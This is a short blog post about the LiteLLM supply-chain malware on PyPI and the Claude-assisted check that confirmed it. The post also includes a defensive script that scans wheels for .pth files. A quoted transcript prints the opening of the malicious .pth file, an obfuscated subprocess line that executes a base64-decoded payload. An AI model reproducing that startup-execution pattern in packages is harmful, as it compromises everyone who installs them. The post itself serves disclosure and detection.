&lt;p&gt;Callum McMahon reported the &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM malware attack&lt;/a&gt; to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt;. Fresh download from PyPI right now in an isolated Docker container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The malicious &lt;code&gt;litellm==1.82.8&lt;/code&gt; is &lt;strong&gt;live on PyPI right now&lt;/strong&gt; and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.&lt;/p&gt;
&lt;/blockquote&gt;
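&lt;p&gt;The core of that check is easy to reproduce: a wheel is just a zip file, so listing any bundled &lt;code&gt;.pth&lt;/code&gt; files - which Python executes at interpreter startup - takes a few lines. This sketch builds a fake wheel in memory for illustration; the file names are made up, not the real malicious payload:&lt;/p&gt;

```python
import io
import zipfile

# Sketch of the wheel inspection: look inside a wheel (a zip archive)
# for top-level .pth files, whose "import ..." lines Python's site
# module executes automatically at interpreter startup.

def find_pth_files(wheel_bytes):
    """Return the names of .pth files shipped in a wheel."""
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as wheel:
        return [name for name in wheel.namelist() if name.endswith(".pth")]

# Build a fake wheel in memory containing a suspicious .pth entry.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as wheel:
    wheel.writestr("litellm/__init__.py", "")
    wheel.writestr("litellm_init.pth", "import os  # runs at startup")

print(find_pth_files(buffer.getvalue()))  # → ['litellm_init.pth']
```

&lt;p&gt;A legitimate wheel rarely needs a &lt;code&gt;.pth&lt;/code&gt; file at all, so any hit from a scan like this deserves a close look.&lt;/p&gt;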
&lt;p&gt;I was chuffed to see Callum use my &lt;a href="https://github.com/simonw/claude-code-transcripts"&gt;claude-code-transcripts&lt;/a&gt; tool to publish the transcript of the conversation.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47531967"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="claude"/><category term="generative-ai"/><category term="supply-chain"/><category term="ai"/><category term="pypi"/><category term="llms"/><category term="ai-security-research"/></entry></feed>